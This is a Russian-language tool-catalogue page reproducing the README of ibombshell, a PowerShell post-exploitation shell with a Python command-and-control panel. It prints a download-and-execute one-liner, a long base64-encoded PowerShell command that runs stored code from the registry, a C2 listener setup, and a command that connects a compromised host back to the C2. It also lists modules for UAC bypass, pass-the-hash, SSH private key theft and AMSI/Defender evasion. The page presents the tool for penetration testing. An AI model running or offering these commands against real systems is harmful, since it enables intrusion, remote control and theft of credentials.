Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ibombshell — Инструмент для развертывания пост-эксплуатационного промпта в любое время | Kitploit
Инструменты/GitHubGitHub/telefonica/ibombshell
Повышение привилегийГенерация полезной нагрузкиОбход IDS/IPSПост-эксплуатацияТестирование на ПроникновениеКомандование и УправлениеRed TeamingИнструмент Удаленного Доступа
GitHubtelefonica/ibombshell

ibombshell

Инструмент для развертывания пост-эксплуатационного промпта в любое время

Репозиторий
321715 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Supported Python versions License

ibombshell — Dynamic Remote Shell

root@kitploit:~
      ,--.!,    _ ____                  __   _____ __         ____
   __/   -*-   (_) __ )____  ____ ___  / /_ / ___// /_  ___  / / /
 ,d08b.  '|`  / / __  / __ \/ __ `__ \/ __ \\__ \/ __ \/ _ \/ / /
 0088MM      / / /_/ / /_/ / / / / / / /_/ /__/ / / / /  __/ / /
 `9MMP'     /_/_____/\____/_/ /_/ /_/_.___/____/_/ /_/\___/_/_/

 [+] Starting the console...
 [*] Console ready!

ibombshell — это инструмент, написанный на PowerShell, который позволяет в любой момент получить командную строку с функциями пост-эксплуатации (а в некоторых случаях и эксплуатации). Это оболочка, которая загружается напрямую в память, предоставляя доступ к большому количеству функций пентестинга. Эти функции могут быть загружены прямо в память в виде функции PowerShell. Такой способ выполнения известен как everywhere.

Кроме того, ibombshell предоставляет второй режим выполнения — Silently, позволяющий пентестеру запустить экземпляр ibombshell (называемый warrior). Скомпрометированный компьютер подключается к панели C2 по HTTP. Таким образом, появляется возможность управлять warrior и загружать функции в память, помогающие пентестеру. Это происходит на этапе пост-эксплуатации.

Предварительные требования

Для запуска ibombshell everywhere требуется PowerShell версии 3.0 или выше. Для операционных систем, отличных от Windows, вы можете узнать больше об этом в PowerShell GitHub — PowerShell для каждой системы!.

Для запуска ibombshell silently mode необходим Python 3.6 и некоторые библиотеки Python. Установить их можно с помощью:

root@kitploit:~
cd ibombshell\ c2/
pip install -r requirements.txt

Примечание: ibombshell C2 работает на python 3.X. Убедитесь, что вы используете pip, соответствующий этой версии.

Использование

ibombshell имеет два режима выполнения:

ibombshell everywhere

Чтобы загрузить ibombshell, просто выполните в PowerShell:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

Теперь вы можете запустить загруженную консоль ibombshell, выполнив:

root@kitploit:~
console

ibombshell everywhere в изолированных средах

Если вам нужно использовать ibombshell в изолированных средах, сначала подготовьте свой компьютер в сетевой среде. Загрузите все необходимые функции и используйте savefunctions, чтобы сохранить их в реестре Windows.

Теперь вы можете использовать этот base64-код для получения ibombshell:

root@kitploit:~
powershell.exe -E "JABwAGEAdABoACAAPQAgACcAaABrAGMAdQA6AFwAcwBvAGYAdAB3AGEAcgBlAFwAYwBsAGEAcwBzAGUAcwBcAGkAYgBvAG0AYgBzAGgAZQBsAGwAXABjAG8AbgBzAG8AbABlACcAOwAgAHQAcgB5ACAAewAJAGkAZgAoAHQAZQ
BzAHQALQBwAGEAdABoACAAJABwAGEAdABoACkAIAB7ACAAJABjAG8AbgBzAG8AbABlACAAPQAgACgARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgACQAcABhAHQAaAApAC4ATgBhAG0AZQA7ACAAYwBkACAAaABrAGMAdQA6
ADsAIAAkAG4AYQBtAGUAIAA9ACAAJABjAG8AbgBzAG8AbABlAC4AcwBwAGwAaQB0ACgAIgBcACIAKQBbAC0AMQBdADsAIAAkAGMAbwBkAGUAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACIAJABjAG
8AbgBzAG8AbABlACIAIAB8ACAAUwBlAGwAZQBjAHQALQBPAGIAagBlAGMAdAAgAC0ARQB4AHAAYQBuAGQAUAByAG8AcABlAHIAdAB5ACAAUAByAG8AcABlAHIAdAB5ACkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUA
YwB0ACAAewBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAcABzAG8AYgBqAGUAYwB0ACAALQBQAHIAbwBwAGUAcgB0AHkAIABAAHsAIgBwAHIAbwBwAGUAcgB0AHkAIgA9ACQAXwA7ACAAIgBWAGEAbAB1AGUAIgAgAD0AIAAoAEcAZQ
B0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiACQAYwBvAG4AcwBvAGwAZQAiACAALQBOAGEAbQBlACAAJABfACkALgAkAF8AfQB9ACkALgBWAGEAbAB1AGUAOwAgACQAYwBvAGQAZQAgAHwAIABv
AHUAdAAtAHMAdAByAGkAbgBnACAAfAAgAGkAZQB4ADsAIABjADoAOwAgAGMAbwBuAHMAbwBsAGUAOwB9AH0AYwBhAHQAYwBoAHsAdwByAGkAdABlAC0AaABvAHMAdAAgACQARQByAHIAbwByAFsAMABdAH0A"

ibombshell silently mode

Эта версия позволяет запускать консоль ibombshell и управлять ею удалённо через панель C2, написанную на Python. Чтобы запустить эту версию, сначала запустите процесс консоли в PowerShell:

root@kitploit:~
iex (new-object net.webclient).downloadstring(‘https://raw.githubusercontent.com/Telefonica/ibombshell/master/console’)

В каталоге ibombshell C2 подготовьте C2:

root@kitploit:~
python3 ibombshell.py

И создайте слушатель, к которому будут подключаться warrior:

root@kitploit:~
iBombShell> load modules/listener.py
[+] Loading module...
[+] Module loaded!
iBombShell[modules/listener.py]> run

Порт слушателя по умолчанию — 8080. Наконец, вы можете запустить консоль в режиме silently на хосте для удалённого управления:

root@kitploit:~
console -Silently -uriConsole http://[ip or domain]:[port]

Схема ibombshell C2

Базовая работа панели управления ibombshell выглядит следующим образом:

root@kitploit:~
        ibombshell                 C2
            |                      |
            |    newibombshell     |
            +--------------------->| --+ register
            |                      |<--+ from IP
            |    get functions     |
            |   and instructions   |
            +--------------------->|
            |                      |
            |    send functions    |
            |   and instructions   |
execute +-- |<---------------------+
        +-->|                      |
            |       results        |
            +--------------------->|
            |                      |

Docker

Мы создали Docker-контейнер со всем необходимым для работы. Выполните эту команду из расположения Dockerfile.

root@kitploit:~
sudo docker build -t "ibombshell" .
sudo docker run -it ibombshell

Примеры видео

Несколько примеров видео...

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: PoC Warrior + Bypass UAC + Pass the hash

iBombShell: macOS

iBombShell: PoC использования с macOS

ibombshell: Извлечение приватных SSH-ключей на Windows 10

ibombshell: Модуль для извлечения приватных SSH-ключей на Windows 10

iBombShell: PoC savefunctions

iBombShell: PoC savefunctions

ibombshell - Silently bypass UAC Environment Injection

ibombshell - Тихий режим для обхода UAC Environment Injection

iBombShell - Mocking Trusted Directory

iBombShell - Mocking Trusted Directory

iBombShell - DLL generation

iBombShell - Генерация DLL

iBombShell - AMSI & Windows Defender Bypass

iBombShell - Обход AMSI и Windows Defender

Лицензия

Этот проект распространяется под лицензией GNU General Public License — подробнее см. в файле LICENSE.

Контакты

ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ», БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ, ЯВНЫХ ИЛИ ПОДРАЗУМЕВАЕМЫХ, ВКЛЮЧАЯ, НО НЕ ОГРАНИЧИВАЯСЬ, ГАРАНТИЯМИ ТОВАРНОЙ ПРИГОДНОСТИ, ПРИГОДНОСТИ ДЛЯ ОПРЕДЕЛЁННОЙ ЦЕЛИ И НЕНАРУШЕНИЯ ПРАВ. НИ ПРИ КАКИХ ОБСТОЯТЕЛЬСТВАХ АВТОРЫ ИЛИ ПРАВООБЛАДАТЕЛИ НЕ НЕСУТ ОТВЕТСТВЕННОСТИ ПО КАКИМ-ЛИБО ИСКАМ, УБЫТКАМ ИЛИ ИНЫМ ТРЕБОВАНИЯМ, ВОЗНИКШИМ В РЕЗУЛЬТАТЕ ДОГОВОРА, ДЕЛИКТА ИЛИ ИНЫМ ОБРАЗОМ, СВЯЗАННЫМ С ПРОГРАММНЫМ ОБЕСПЕЧЕНИЕМ ИЛИ ЕГО ИСПОЛЬЗОВАНИЕМ ИЛИ ИНЫМИ ДЕЙСТВИЯМИ С НИМ. ВНОСЯ ВКЛАД В РЕПОЗИТОРИЙ, СОДЕРЖАЩИЙ УВЕДОМЛЕНИЕ О ЛИЦЕНЗИИ, ВЫ ПРЕДОСТАВЛЯЕТЕ СВОЙ ВКЛАД НА ТЕХ ЖЕ УСЛОВИЯХ И ПОДТВЕРЖДАЕТЕ, ЧТО ИМЕЕТЕ ПРАВО ПРЕДОСТАВЛЯТЬ ЕГО НА ТАКИХ УСЛОВИЯХ. ЕСЛИ У ВАС ЕСТЬ ОТДЕЛЬНОЕ СОГЛАШЕНИЕ О ЛИЦЕНЗИРОВАНИИ ВАШИХ ВКЛАДОВ НА ДРУГИХ УСЛОВИЯХ, ТАКОЕ КАК СОГЛАШЕНИЕ О ЛИЦЕНЗИИ ВКЛАДЧИКА, ТО ЭТО СОГЛАШЕНИЕ ИМЕЕТ ПРИОРИТЕТ.

Данное программное обеспечение не имеет процесса контроля качества. Это Proof of Concept.

Если у вас возникли проблемы, вы можете связаться:

[email protected]

Скачать инструмент